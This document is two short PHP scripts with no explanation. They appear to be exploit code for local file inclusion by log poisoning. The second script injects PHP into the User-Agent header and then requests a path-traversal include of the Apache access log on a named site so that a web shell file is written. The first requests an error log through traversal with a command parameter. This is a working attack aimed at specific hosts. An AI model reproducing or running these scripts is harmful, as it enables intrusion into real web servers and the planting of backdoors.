<?php @set_time_limit(0); @ini_set("display_errors","1"); function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_USERAGENT, 'Opera foreva'); curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp"); $ss=curl_exec($ch); curl_close($ch); return $ss; } $a=get('http://site.ru/index.php&file=../../../../../../../logs/error.log&cmd=copy.......;'); #echo $a; echo 'ok'; ?>
<?php @set_time_limit(0); @ini_set("display_errors","1"); function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_USERAGENT, "<?php fwrite(fopen('shell.php','w+'),'<?php phpinfo();?>') ?>"); curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp"); $ss=curl_exec($ch); curl_close($ch); return $ss; } $a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log'); #echo $a; echo 'ok'; ?>